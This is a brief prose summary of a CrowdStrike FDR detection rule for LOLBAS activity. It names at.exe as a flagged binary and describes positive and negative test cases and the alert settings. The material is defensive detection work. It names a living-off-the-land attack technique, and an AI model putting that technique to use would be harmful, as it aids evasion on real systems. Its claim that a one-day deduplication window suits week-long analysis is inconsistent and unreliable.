The Crowdstrike FDR LOLBAS rule is designed to detect the usage of Living Off The Land Binaries and Scripts (LOLbins), which are legitimate software tools that can be misused by attackers for malicious purposes. The rule specifically targets Crowdstrike FDREvent logs to identify potential instances of LOLBAS execution. A key aspect of this rule is its use of command-line parameters associated with known LOLbins, such as Windows system utilities like 'at.exe'. The detection approach involves checking for executed commands that match patterns indicative of LOLBAS usage while filtering out benign activities to reduce false positives. Testing is conducted through two scenarios: a positive test detecting the use of 'at.exe' and a negative test ensuring that common applications like Notepad do not trigger alerts. The rule is currently disabled and requires configuration for deployment. The definition adheres to a 1-event threshold and operates on a 1440-minute deduplication period, making it suitable for week-long analysis intervals.